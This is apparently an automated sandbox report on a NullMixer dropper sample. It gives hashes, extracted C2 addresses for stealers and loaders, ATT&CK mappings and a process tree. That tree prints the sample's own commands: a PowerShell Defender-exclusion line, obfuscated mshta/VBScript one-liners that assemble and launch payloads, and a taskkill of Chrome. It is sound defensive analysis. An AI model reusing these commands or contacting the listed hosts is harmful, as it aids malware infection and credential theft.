Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    03-04-2024 23:42

General

  • Target

    a9d63ba83576c19bb1dbad9e85b51ecc_JaffaCakes118.exe

  • Size

    5.9MB

  • MD5

    a9d63ba83576c19bb1dbad9e85b51ecc

  • SHA1

    f37937e9afd6c78be38c58ebf84a03f66091c03c

  • SHA256

    995d009e2fa6b510a0251895e0e71d0709ebfdeac782eae91caa3b4ee30bd29b

  • SHA512

    e2ae86e9ace7e96c1097c5e570644824dcc07c9fc477bde54a43f91abadca11171cf649f9612e88107cb4cdfd700ff1e8a21c54d3432eb6f3089d9e6e3b65b62

  • SSDEEP

    98304:JaZL5WwT7cp5HNGSNhOpW8XIw0J+OfIxJ67PYpVd9kxzamMHf42P8baI2BWcjOzF:JaZoYc5geAAILMYpBiam9e8OIiFOz8q

Malware Config

Extracted

Family

privateloader

C2

http://45.133.1.107/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

51.178.186.149

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Attributes
  • auth_value

    b69102cdbd4afe2d3159f88fb6dac731

Extracted

Family

vidar

Version

41.4

Botnet

916

C2

https://mas.to/@sslam

Attributes
  • profile_id

    916

Extracted

Family

nullmixer

C2

http://hsiens.xyz/

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32
rc4.i32

Extracted

Family

smokeloader

Botnet

pub5

Extracted

Family

gcleaner

C2

ppp-gl.biz

45.9.20.13

Extracted

Family

redline

Botnet

ANI

C2

194.104.136.5:46013

Attributes
  • auth_value

    9491a1c5e11eb6097e68a4fa8627fda8

Signatures

  • Detect Fabookie payload 1 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • NullMixer

    NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.

  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 7 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars payload 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • OnlyLogger payload 1 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 3 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a9d63ba83576c19bb1dbad9e85b51ecc_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\a9d63ba83576c19bb1dbad9e85b51ecc_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2580
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
            PID:2588
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2272
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sat11c6378d2d.exe
            4⤵
            • Loads dropped DLL
            PID:2716
            • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11c6378d2d.exe
              Sat11c6378d2d.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:2364
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sat1172dcffed8ac.exe
            4⤵
            • Loads dropped DLL
            PID:2736
            • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat1172dcffed8ac.exe
              Sat1172dcffed8ac.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Modifies system certificate store
              PID:1396
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sat11dba36c1fa155.exe /mixone
            4⤵
            • Loads dropped DLL
            PID:2760
            • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11dba36c1fa155.exe
              Sat11dba36c1fa155.exe /mixone
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: GetForegroundWindowSpam
              PID:1628
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sat1183663dbb.exe
            4⤵
            • Loads dropped DLL
            PID:2740
            • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat1183663dbb.exe
              Sat1183663dbb.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1324
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat1183663dbb.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat1183663dbb.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                6⤵
                  PID:3024
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat1183663dbb.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat1183663dbb.exe" ) do taskkill /F -Im "%~NxU"
                    7⤵
                      PID:1856
                      • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                        09xU.EXE -pPtzyIkqLZoCarb5ew
                        8⤵
                        • Executes dropped EXE
                        PID:1728
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                          9⤵
                            PID:1604
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                              10⤵
                                PID:2648
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                              9⤵
                                PID:2656
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                  10⤵
                                    PID:3060
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                      11⤵
                                        PID:1240
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                        11⤵
                                          PID:2664
                                        • C:\Windows\SysWOW64\control.exe
                                          control .\R6f7sE.I
                                          11⤵
                                            PID:2428
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                              12⤵
                                                PID:2620
                                                • C:\Windows\system32\RunDll32.exe
                                                  C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                  13⤵
                                                    PID:1880
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                      14⤵
                                                        PID:1208
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /F -Im "Sat1183663dbb.exe"
                                            8⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2024
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sat11774c8a276a66c.exe
                                    4⤵
                                    • Loads dropped DLL
                                    PID:2764
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11774c8a276a66c.exe
                                      Sat11774c8a276a66c.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1740
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sat11a033780a.exe
                                    4⤵
                                    • Loads dropped DLL
                                    PID:2660
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11a033780a.exe
                                      Sat11a033780a.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1104
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sat11f7ff9216f1cc.exe
                                    4⤵
                                    • Loads dropped DLL
                                    PID:2144
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11f7ff9216f1cc.exe
                                      Sat11f7ff9216f1cc.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of SetThreadContext
                                      PID:1296
                                      • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11f7ff9216f1cc.exe
                                        C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11f7ff9216f1cc.exe
                                        6⤵
                                        • Executes dropped EXE
                                        PID:1324
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sat117453ee4930fe0.exe
                                    4⤵
                                    • Loads dropped DLL
                                    PID:2324
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat117453ee4930fe0.exe
                                      Sat117453ee4930fe0.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1852
                                      • C:\Windows\SysWOW64\mshta.exe
                                        "C:\Windows\System32\mshta.exe" VBsCRipt:cLosE ( creATEobjEct ( "wScRiPt.sHEll" ). RUn ( "C:\Windows\system32\cmd.exe /q /r TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat117453ee4930fe0.exe"" >odkUUtX.EXE&& StARt oDKUUtx.Exe /pTRun8i34NPJhus12 &iF """" == """" for %A IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat117453ee4930fe0.exe"" ) do taskkill -IM ""%~NxA"" -f " , 0 , tRuE ) )
                                        6⤵
                                          PID:2068
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /q /r TYPe "C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat117453ee4930fe0.exe" >odkUUtX.EXE&& StARt oDKUUtx.Exe /pTRun8i34NPJhus12 &iF "" == "" for %A IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat117453ee4930fe0.exe" ) do taskkill -IM "%~NxA" -f
                                            7⤵
                                              PID:1068
                                              • C:\Users\Admin\AppData\Local\Temp\odkUUtX.EXE
                                                oDKUUtx.Exe /pTRun8i34NPJhus12
                                                8⤵
                                                • Executes dropped EXE
                                                PID:1600
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" VBsCRipt:cLosE ( creATEobjEct ( "wScRiPt.sHEll" ). RUn ( "C:\Windows\system32\cmd.exe /q /r TYPe ""C:\Users\Admin\AppData\Local\Temp\odkUUtX.EXE"" >odkUUtX.EXE&& StARt oDKUUtx.Exe /pTRun8i34NPJhus12 &iF ""/pTRun8i34NPJhus12 "" == """" for %A IN ( ""C:\Users\Admin\AppData\Local\Temp\odkUUtX.EXE"" ) do taskkill -IM ""%~NxA"" -f " , 0 , tRuE ) )
                                                  9⤵
                                                    PID:2688
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /q /r TYPe "C:\Users\Admin\AppData\Local\Temp\odkUUtX.EXE" >odkUUtX.EXE&& StARt oDKUUtx.Exe /pTRun8i34NPJhus12 &iF "/pTRun8i34NPJhus12 " == "" for %A IN ( "C:\Users\Admin\AppData\Local\Temp\odkUUtX.EXE" ) do taskkill -IM "%~NxA" -f
                                                      10⤵
                                                        PID:2780
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" VbSCRipT: CLose (CREateOBJeCT ("wScRiPT.ShelL" ). rUn( "cmd.Exe /R ECHo akJ%RANdom%S6> OsOp.l & ecHO | SeT /P = ""MZ"" > TG4B.3Y & CoPy /y /b TG4B.3Y + DRRsN4.HX9 +4EMMBR.CM +F2IMq.H9n +IDYdAw.b + OSoP.L Y2LM.I & sTArT msiexec /Y .\Y2LM.I " , 0 , TruE ) )
                                                      9⤵
                                                        PID:2788
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /R ECHo akJ%RANdom%S6> OsOp.l & ecHO | SeT /P = "MZ" > TG4B.3Y & CoPy /y /b TG4B.3Y + DRRsN4.HX9 +4EMMBR.CM +F2IMq.H9n +IDYdAw.b + OSoP.L Y2LM.I & sTArT msiexec /Y .\Y2LM.I
                                                          10⤵
                                                            PID:2672
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" ecHO "
                                                              11⤵
                                                                PID:2456
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>TG4B.3Y"
                                                                11⤵
                                                                  PID:1172
                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                  msiexec /Y .\Y2LM.I
                                                                  11⤵
                                                                    PID:1636
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill -IM "Sat117453ee4930fe0.exe" -f
                                                              8⤵
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1688
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c Sat119216ef3957e64.exe
                                                      4⤵
                                                      • Loads dropped DLL
                                                      PID:2888
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat119216ef3957e64.exe
                                                        Sat119216ef3957e64.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:760
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c Sat1174aaee9df2.exe
                                                      4⤵
                                                      • Loads dropped DLL
                                                      PID:1968
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat1174aaee9df2.exe
                                                        Sat1174aaee9df2.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Modifies system certificate store
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1704
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                          6⤵
                                                            PID:1160
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im chrome.exe
                                                              7⤵
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2780
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Sat114bd3f1cd0aec1fc.exe
                                                        4⤵
                                                        • Loads dropped DLL
                                                        PID:1904
                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat114bd3f1cd0aec1fc.exe
                                                          Sat114bd3f1cd0aec1fc.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:1112
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1416
                                                            6⤵
                                                            • Program crash
                                                            PID:2584
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Sat11e3c9238d6c.exe
                                                        4⤵
                                                        • Loads dropped DLL
                                                        PID:1980
                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11e3c9238d6c.exe
                                                          Sat11e3c9238d6c.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:796
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Sat115453b36686.exe
                                                        4⤵
                                                        • Loads dropped DLL
                                                        PID:2220
                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat115453b36686.exe
                                                          Sat115453b36686.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1908
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Sat11b592c84aa.exe
                                                        4⤵
                                                        • Loads dropped DLL
                                                        PID:1020
                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11b592c84aa.exe
                                                          Sat11b592c84aa.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:1752
                                                          • C:\Users\Admin\AppData\Local\Temp\is-G674L.tmp\Sat11b592c84aa.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-G674L.tmp\Sat11b592c84aa.tmp" /SL5="$301C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11b592c84aa.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            PID:2052
                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11b592c84aa.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11b592c84aa.exe" /SILENT
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:772
                                                              • C:\Users\Admin\AppData\Local\Temp\is-CU1C4.tmp\Sat11b592c84aa.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-CU1C4.tmp\Sat11b592c84aa.tmp" /SL5="$301F0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11b592c84aa.exe" /SILENT
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                PID:1612
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Sat116f0e3cb0.exe
                                                        4⤵
                                                        • Loads dropped DLL
                                                        PID:1588
                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat116f0e3cb0.exe
                                                          Sat116f0e3cb0.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:1556
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 484
                                                        4⤵
                                                        • Program crash
                                                        PID:2824
                                                • C:\Windows\system32\wbem\WMIADAP.EXE
                                                  wmiadap.exe /F /T /R
                                                  1⤵
                                                    PID:2052

                                                  Network

                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                  Defense Evasion

                                                  Subvert Trust Controls

                                                  1
                                                  T1553

                                                  Install Root Certificate

                                                  1
                                                  T1553.004

                                                  Modify Registry

                                                  1
                                                  T1112

                                                  Credential Access

                                                  Unsecured Credentials

                                                  1
                                                  T1552

                                                  Credentials In Files

                                                  1
                                                  T1552.001

                                                  Discovery

                                                  Query Registry

                                                  2
                                                  T1012

                                                  System Information Discovery

                                                  2
                                                  T1082

                                                  Peripheral Device Discovery

                                                  1
                                                  T1120

                                                  Collection

                                                  Data from Local System

                                                  1
                                                  T1005

                                                  Command and Control

                                                  Web Service

                                                  1
                                                  T1102

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                    Filesize

                                                    68KB

                                                    MD5

                                                    29f65ba8e88c063813cc50a4ea544e93

                                                    SHA1

                                                    05a7040d5c127e68c25d81cc51271ffb8bef3568

                                                    SHA256

                                                    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

                                                    SHA512

                                                    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                    Filesize

                                                    344B

                                                    MD5

                                                    591e569365bfd6cc117fcc733c3ab29b

                                                    SHA1

                                                    4b822d3eebfdfe37c756d3c3ab6f04d119937c8b

                                                    SHA256

                                                    d44096df33208ae9d1426e54cc57b156c8285f842141bbd38c65e7ad052f8e36

                                                    SHA512

                                                    e1308190c9e8c98b8a9063a52ec4b845fd0b7b8c6c57afff54d68fc8b77a1eaaafbb55d4cc2ea99210d3d6dfc56159394a2603f18f07f496108490caf443bf91

                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat114bd3f1cd0aec1fc.exe
                                                    Filesize

                                                    722KB

                                                    MD5

                                                    fd31b5aa39859ea8b70f33c9ba658287

                                                    SHA1

                                                    37a46af3b91576daf6e00f4f335329ed968a2318

                                                    SHA256

                                                    928707566b58eb96658bb8540e29cc38e1853d454f55918d7924c558224aa785

                                                    SHA512

                                                    c97ba0eac43c5eeb1e564bb026003a9346f97ac7f2759ecea9c983cfb792813cdb99a6f9eeee10c12efcd610aceaa8786efe9d29f6dbc7674413626332e9e9ad

                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat1172dcffed8ac.exe
                                                    Filesize

                                                    402KB

                                                    MD5

                                                    d08cc10c7c00e13dfb01513f7f817f87

                                                    SHA1

                                                    f3adddd06b5d5b3f7d61e2b72860de09b410f571

                                                    SHA256

                                                    0fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d

                                                    SHA512

                                                    0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0

                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat117453ee4930fe0.exe
                                                    Filesize

                                                    1.3MB

                                                    MD5

                                                    3c395bffbb2a759c6217d05383336403

                                                    SHA1

                                                    a2cd29407f183e3cf99f0fde776805179d101df9

                                                    SHA256

                                                    12e807b75f95921fc97203b71a88a17e93ff3f5608d804231042aaddfe2536fc

                                                    SHA512

                                                    ca873ded3b993860843d967036f96ed146093d05a1873ddd31a836c0051875d912aa00d31553c62b72b7d534a557714898ea1473b561544f32df377c9330325a

                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat1174aaee9df2.exe
                                                    Filesize

                                                    1.4MB

                                                    MD5

                                                    ba8541c57dd3aae16584e20effd4c74c

                                                    SHA1

                                                    5a49e309db2f74485db177fd9b69e901e900c97d

                                                    SHA256

                                                    dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c

                                                    SHA512

                                                    1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d

                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11774c8a276a66c.exe
                                                    Filesize

                                                    89KB

                                                    MD5

                                                    37a1c118196892aa451573a142ea05d5

                                                    SHA1

                                                    4144c1a571a585fef847da516be8d89da4c8771e

                                                    SHA256

                                                    a3befd523e1e2f4e6f8fce281963f5efb85fe54d85ba67746cc58823d479e92a

                                                    SHA512

                                                    aac6321582dac5d82cbdb197c20370df3436cf884bea44cbc6d156fd6c4fa99340a3fa866862b83fb0866b31a1e4ebdd73c462972beeb299d4af95592c1d94db

                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat1183663dbb.exe
                                                    Filesize

                                                    1.2MB

                                                    MD5

                                                    7c6b2dc2c253c2a6a3708605737aa9ae

                                                    SHA1

                                                    cf4284f29f740b4925fb2902f7c3f234a5744718

                                                    SHA256

                                                    b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

                                                    SHA512

                                                    19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat119216ef3957e64.exe
                                                    Filesize

                                                    402KB

                                                    MD5

                                                    06ee576f9fdc477c6a91f27e56339792

                                                    SHA1

                                                    4302b67c8546d128f3e0ab830df53652f36f4bb0

                                                    SHA256

                                                    035373a454afd283da27ebf569ab355be7db470a1a30c3695e18c984b785e1f8

                                                    SHA512

                                                    e5b337158905651e2740378615fcd9a8ba2b5e46f02c75be20c22e89b4cb40e8f1dfec1c5c1135f4d59114da9200a772f591622eddb865880b296321d80fb616

                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11a033780a.exe
                                                    Filesize

                                                    429KB

                                                    MD5

                                                    ecc773623762e2e326d7683a9758491b

                                                    SHA1

                                                    ad186c867976dc5909843418853d54d4065c24ba

                                                    SHA256

                                                    8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838

                                                    SHA512

                                                    40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4

                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8AD5C66\Sat11b592c84aa.exe
                                                    Filesize

                                                    379KB

                                                    MD5

                                                    7c20266d1026a771cc3748fe31262057

                                                    SHA1

                                                    fc83150d1f81bfb2ff3c3d004ca864d53004fd27

                                                    SHA256

